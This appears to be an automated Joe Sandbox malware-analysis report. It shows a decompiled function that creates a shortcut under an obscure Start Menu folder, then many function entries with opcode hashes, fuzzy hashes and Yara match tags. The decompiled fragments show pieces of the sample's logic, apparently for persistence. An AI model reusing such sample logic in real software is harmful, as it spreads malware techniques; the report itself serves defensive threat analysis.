				 *((intOrPtr*)(_t107 - 8)) = E00402C53(2);
				 *((intOrPtr*)(_t107 - 0x48)) = E00402C53(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402C53(0x45);
				_t52 =  *(_t107 - 0x18);
				 *(_t107 - 0x44) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405C3D( *((intOrPtr*)(_t107 - 0x38))) == 0) {
					E00402C53(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x30);
					 *((intOrPtr*)(_t107 - 0x10)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x38)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93\\Vatersotiges\\Knoglemarvsundersgelsen\\Armoniac");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x48));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x44));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x30));
							 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x50)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x30));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                                    0x0040210d
                                                    0x00402117
                                                    0x00402121
                                                    0x0040212b
                                                    0x00402136
                                                    0x00402139
                                                    0x00402153
                                                    0x00402156
                                                    0x0040215c
                                                    0x0040215f
                                                    0x00402169
                                                    0x0040216d
                                                    0x0040216d
                                                    0x00402172
                                                    0x00402183
                                                    0x0040218b
                                                    0x00402242
                                                    0x00402242
                                                    0x00402249
                                                    0x00402191
                                                    0x00402191
                                                    0x004021a0
                                                    0x004021a4
                                                    0x004021a7
                                                    0x004021ad
                                                    0x004021bb
                                                    0x004021be
                                                    0x004021c0
                                                    0x004021cb
                                                    0x004021cb
                                                    0x004021d0
                                                    0x004021d2
                                                    0x004021d9
                                                    0x004021d9
                                                    0x004021dc
                                                    0x004021e5
                                                    0x004021e8
                                                    0x004021ee
                                                    0x004021f0
                                                    0x004021fa
                                                    0x004021fa
                                                    0x004021fd
                                                    0x00402206
                                                    0x00402209
                                                    0x00402212
                                                    0x00402218
                                                    0x0040221a
                                                    0x00402228
                                                    0x00402228
                                                    0x0040222b
                                                    0x00402231
                                                    0x00402231
                                                    0x00402234
                                                    0x0040223a
                                                    0x00402240
                                                    0x00402255
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00402240
                                                    0x0040224b
                                                    0x00402ade
                                                    0x00402aea

                                                    APIs
                                                    • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                    Strings
                                                    • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac, xrefs: 004021C3
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CreateInstance
                                                    • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac
                                                    • API String ID: 542301482-3132586757
                                                    • Opcode ID: c72f0e810d727f864fb8bca41691c297925c344fd509e867a6a74c93a09c866a
                                                    • Instruction ID: b00d62d96fbd26c6029c0673ccd5b1c7279e8b7dfa3a64310cdf9804068cc62f
                                                    • Opcode Fuzzy Hash: c72f0e810d727f864fb8bca41691c297925c344fd509e867a6a74c93a09c866a
                                                    • Instruction Fuzzy Hash: C5414C71A00219AFCB00EFE4C988A9D7BB5FF48358B20457AF505EB2D1DB799982CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0332C1ED Relevance: 3.4, Strings: 2, Instructions: 943COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: #~xj$UI2
                                                    • API String ID: 0-2322224301
                                                    • Opcode ID: b3ebf93f196fcd23d1061b45d087a610d2fa8a9c3861cd1ac764142b1c0ee610
                                                    • Instruction ID: d60eb0149605617d8ad9fcff9c8cea5f0cda2c4ba8503e78615a10b2fe95ac6e
                                                    • Opcode Fuzzy Hash: b3ebf93f196fcd23d1061b45d087a610d2fa8a9c3861cd1ac764142b1c0ee610
                                                    • Instruction Fuzzy Hash: 7822BA3A424E554EC325CE78D5C01DEBFA0BF37261B342A658649EF643F233570ACA96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0333C1AB Relevance: 3.1, Strings: 2, Instructions: 556COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ($MmbK
                                                    • API String ID: 0-4056475282
                                                    • Opcode ID: 2ce7b4aae7c2be467ab81cdd731e0932ef6e1012b6a5607a8e881b55e787ab1b
                                                    • Instruction ID: 3744a5f8a768e65107f45f79759415c18f3a4bfa445ad71193a6ae66b215dc07
                                                    • Opcode Fuzzy Hash: 2ce7b4aae7c2be467ab81cdd731e0932ef6e1012b6a5607a8e881b55e787ab1b
                                                    • Instruction Fuzzy Hash: C922F2715063448FDB7A8E38C9A63DA3B72EF63354FA5815ECC46AB564D3360687CB02
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0334162E Relevance: 3.0, Strings: 2, Instructions: 482COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HZ$\m
                                                    • API String ID: 0-480204679
                                                    • Opcode ID: 3b594488f748e5e3d4e23f6edacaec1035717f31139c1bbbe381b1fe6aeb7845
                                                    • Instruction ID: 3560d2b4c27b8ef3900f8ebfb66c17ed2a7a23e48cf0cbf7c204f01ce29324a8
                                                    • Opcode Fuzzy Hash: 3b594488f748e5e3d4e23f6edacaec1035717f31139c1bbbe381b1fe6aeb7845
                                                    • Instruction Fuzzy Hash: CBD1AA3A914B544FCB25CE78D5C11DABFF1AF3A350F24056AD948EFA03E2325646CB86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0333F53D Relevance: 2.6, Strings: 2, Instructions: 122COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: > Sm$HlmW
                                                    • API String ID: 0-1370200313
                                                    • Opcode ID: 4dc007361b3d595115762d949add78f77da54ccf60cd5839094f72ea1d8540cc
                                                    • Instruction ID: d2df470fae6fd7c62e00fd3c2bdd54f195b9325a4c5aeccb53397b497938c225
                                                    • Opcode Fuzzy Hash: 4dc007361b3d595115762d949add78f77da54ccf60cd5839094f72ea1d8540cc
                                                    • Instruction Fuzzy Hash: 97410575A0474A9FDF749E3888E07EE33D2AF45260F90462EDC5ACE184DB31D9858A12
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0332000E Relevance: 2.1, Strings: 1, Instructions: 820COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: fb62d0a9bd6fcfb53a6cb06f49c9753553ea3a27e5f030185c18c1cde1705e15
                                                    • Instruction ID: 212047fa2619610442559053eb2f36615ee0fcd7992eb95ba36118c7d4cd2dde
                                                    • Opcode Fuzzy Hash: fb62d0a9bd6fcfb53a6cb06f49c9753553ea3a27e5f030185c18c1cde1705e15
                                                    • Instruction Fuzzy Hash: A0028BA3E2E33589E7C3B030C6917A65E88DF27196F22CF569836B1D61771F4A8E05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0332036A Relevance: 2.1, Strings: 1, Instructions: 817COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: e2a765e7f57679e52037ebde7adeb18ec559af7be5bbe16f9f86bb1bf6dc3764
                                                    • Instruction ID: 65172d0a04223e93ed89f1de83b822d943436386a8e990b3a3dcfa5156f49d09
                                                    • Opcode Fuzzy Hash: e2a765e7f57679e52037ebde7adeb18ec559af7be5bbe16f9f86bb1bf6dc3764
                                                    • Instruction Fuzzy Hash: 0B029AA3E2E33589E7D3B030C6917A65E88DF27186F22CF569836B1D61771F4A8E05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03320277 Relevance: 2.0, Strings: 1, Instructions: 784COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 3de5dca6d7dcdbf0138aff4df5376521a662c8a243597b18bae56655ccc65d07
                                                    • Instruction ID: ddf09fc1e2f821c55986b6fc67a968572abda9e3c94f78c7cfaf5787d71ab52c
                                                    • Opcode Fuzzy Hash: 3de5dca6d7dcdbf0138aff4df5376521a662c8a243597b18bae56655ccc65d07
                                                    • Instruction Fuzzy Hash: E002ACA3E2E33589E7D3B030C6917A65E88DF27186F22CF569836B1D61771F4A8E05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03320192 Relevance: 2.0, Strings: 1, Instructions: 773COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: cd24145e8ba909e01983dda809319ad4db82d8e59b6c5a98f732460585011e1d
                                                    • Instruction ID: f780e5c01b2afb3204158c0dbb7813e6930d0706baea0aa2aa8e7d75ce87857e
                                                    • Opcode Fuzzy Hash: cd24145e8ba909e01983dda809319ad4db82d8e59b6c5a98f732460585011e1d
                                                    • Instruction Fuzzy Hash: 0F02ABA3E2E33589E7D3A030C6D17A65E88DF27186F22CF569836B1D61771F4A8E05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 033200AB Relevance: 2.0, Strings: 1, Instructions: 765COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 231a6047c82b9349707e4f1c6f9d39ec8c574c451b6b59eb0156268c677f7e62
                                                    • Instruction ID: 1f0869e3018dea0e29e534467c05c55900a9590939604e9a564690cd28b3dc3a
                                                    • Opcode Fuzzy Hash: 231a6047c82b9349707e4f1c6f9d39ec8c574c451b6b59eb0156268c677f7e62
                                                    • Instruction Fuzzy Hash: BA028BA3E2E33589E7C3B030C6917A65E88DF27196F22CF569836B1D61771F4A8E05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03320F7D Relevance: 2.0, Strings: 1, Instructions: 756COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 5e66ec42284c03a72aae42121224fa60c8834c07b502b9ad939e2ea336269517
                                                    • Instruction ID: 3b579cc0a5e20ccbcefa6e6de2e3d37147485c7ada9db422a50af4e8d3fb7109
                                                    • Opcode Fuzzy Hash: 5e66ec42284c03a72aae42121224fa60c8834c07b502b9ad939e2ea336269517
                                                    • Instruction Fuzzy Hash: 8CF15973D2A37588EA93E036C7D17B65E8CDF331A2F11CB96D826B1D63761E4A4D0484
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03320B50 Relevance: 2.0, Strings: 1, Instructions: 730COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 27f3971527e8f5a8a5b30ab4722672c7e07a0bcd083ba9347369d2be1250a9a6
                                                    • Instruction ID: 2b6304e17987578e74dbc6d7c2d1537f96980f77c39f59a4ec48c46e1f43dc56
                                                    • Opcode Fuzzy Hash: 27f3971527e8f5a8a5b30ab4722672c7e07a0bcd083ba9347369d2be1250a9a6
                                                    • Instruction Fuzzy Hash: 61F1ADB2D29334A8E6BBE0708ED07BE5E44DF23186F1D8B176837B9961761B4A8D04C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03320ED9 Relevance: 2.0, Strings: 1, Instructions: 727COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 8bf43e7de76a9a9040085130f234ca02de5583d1757693e83eb48d0b1d907539
                                                    • Instruction ID: c02e0905a376f9b174c8c3a2a99b11b799fcc00b163a6bbda6b28101479e90e9
                                                    • Opcode Fuzzy Hash: 8bf43e7de76a9a9040085130f234ca02de5583d1757693e83eb48d0b1d907539
                                                    • Instruction Fuzzy Hash: BCE18AA3D2A33589EB83E035C7D17A65E8CDF37192F22CB5A9826B1D62771F4A4D04C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 033203DF Relevance: 2.0, Strings: 1, Instructions: 715COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 9f1224297ccb40bdd4616511ffddb3a98baf4914f89b660d5ed7e5cd38da27e4
                                                    • Instruction ID: 2b1bbfe1c257e7f4d9e162eb99189a9da9c57bd4595a254cf14ae889f3ed67dc
                                                    • Opcode Fuzzy Hash: 9f1224297ccb40bdd4616511ffddb3a98baf4914f89b660d5ed7e5cd38da27e4
                                                    • Instruction Fuzzy Hash: 97F1AAA3E2E33589E7D3B030C6917A65E88DF27186F22CF569836B1D61771F4A8E04C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03320614 Relevance: 2.0, Strings: 1, Instructions: 711COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 018834f1c8ce42a9979e6eed9b291ead3da0ac890c7b67648e07f3bfb5338c26
                                                    • Instruction ID: 15adaa05c5165332cf6a6e262be808eb345da4a50fca26efbcf33c22267d5d9f
                                                    • Opcode Fuzzy Hash: 018834f1c8ce42a9979e6eed9b291ead3da0ac890c7b67648e07f3bfb5338c26
                                                    • Instruction Fuzzy Hash: 73F1AAA3E2E33589E7D3B030C6917A65E88DF23186F22CF5A9836B1D61771F4A8D04C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03320535 Relevance: 1.9, Strings: 1, Instructions: 698COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: c20d074860056131076976df05492afd838f090c261fcb7bd32bd9c9607c4e31
                                                    • Instruction ID: 4ec9e5b616c78655229c67003909896e65b81c2cbda3ad69338e385658ca72ef
                                                    • Opcode Fuzzy Hash: c20d074860056131076976df05492afd838f090c261fcb7bd32bd9c9607c4e31
                                                    • Instruction Fuzzy Hash: 12F1AAA3E2E33589E7D3B030C6917A65E88DF23196F22CF569836B1D61771F4A8E04C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03320001 Relevance: 1.9, Strings: 1, Instructions: 690COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 715974427be20fee436f40488a223ea0ab1f2513ab780ed4b57fa83f91544533
                                                    • Instruction ID: 050bb071980aecf6f994075d63584e34333bca14aaeeb9d5c7a1d52b12086df3
                                                    • Opcode Fuzzy Hash: 715974427be20fee436f40488a223ea0ab1f2513ab780ed4b57fa83f91544533
                                                    • Instruction Fuzzy Hash: 1C028BA3E2E33589E7C3B030C6917A65E88DF27196F22CF569836B1D61771F4A8E05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03320313 Relevance: 1.9, Strings: 1, Instructions: 674COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 6bfd47932b9742ca4601e1c4a69f555bad79e58e525ee4b5fe91c59872e9fd07
                                                    • Instruction ID: 2ce80dc62612c16d2efe55301e974189201b91d3e8396a7843262cc98c476fea
                                                    • Opcode Fuzzy Hash: 6bfd47932b9742ca4601e1c4a69f555bad79e58e525ee4b5fe91c59872e9fd07
                                                    • Instruction Fuzzy Hash: 3202AAA3E2E33589E793B030C6D17A65E88DF27186F22CF569836B1D61771F4A8E04C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03320175 Relevance: 1.9, Strings: 1, Instructions: 671COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 75f06dbd41fde87e77743f137942b05854d2d335c2c86e48211acbc8e470ea5b
                                                    • Instruction ID: bd82c7cc6e302a547cb0efed29727c7cadbb70f3e1af5aca41d51d9ff7b7b083
                                                    • Opcode Fuzzy Hash: 75f06dbd41fde87e77743f137942b05854d2d335c2c86e48211acbc8e470ea5b
                                                    • Instruction Fuzzy Hash: 65029BA3E2E33589E7C3B030C6917A65E88DF27196F22CF569836B1D61771F4A8E05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03320252 Relevance: 1.9, Strings: 1, Instructions: 658COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: a2d500792c3b7a3fb9849d19f6c006a1b5f1a6bb659809736b6c1bb8d960ebb9
                                                    • Instruction ID: 40ed774ac3fb3630ba70e7c3d41f7d513dfc5b426f0700ee62e7529f9958ce05
                                                    • Opcode Fuzzy Hash: a2d500792c3b7a3fb9849d19f6c006a1b5f1a6bb659809736b6c1bb8d960ebb9
                                                    • Instruction Fuzzy Hash: CE02ABA3E2E33589E7D3B030C6917A65E88DF27186F22CF569836B1D61771F4A8E05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 033205A3 Relevance: 1.9, Strings: 1, Instructions: 644COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: e124067a4a348505f81aed3c83b0fad850935a4b469b71a24f3d100abb5da4a7
                                                    • Instruction ID: 166b3ec63abad36defd60da9e9d6ea96587fd3dcea09be09268c7c774d9c6b7f
                                                    • Opcode Fuzzy Hash: e124067a4a348505f81aed3c83b0fad850935a4b469b71a24f3d100abb5da4a7
                                                    • Instruction Fuzzy Hash: 32F1A9A3E2E335C9E7D3A030C6917A65E88DF23196F22CF569836B1D61771F4A8D05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0332044C Relevance: 1.9, Strings: 1, Instructions: 644COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: f453a78d419069d7fbb8135056e6b845fb442eab4f339221715cb31b0fa4252b
                                                    • Instruction ID: 7ccf85587737e4fa53395f58545d344476d671ae53b13f38293fc52fc942a6da
                                                    • Opcode Fuzzy Hash: f453a78d419069d7fbb8135056e6b845fb442eab4f339221715cb31b0fa4252b
                                                    • Instruction Fuzzy Hash: 46F19AA3E2E33589E7D3B030C6917A65E88DF27196F22CF569836B1D61771F4A8E04C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 033204A4 Relevance: 1.9, Strings: 1, Instructions: 641COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
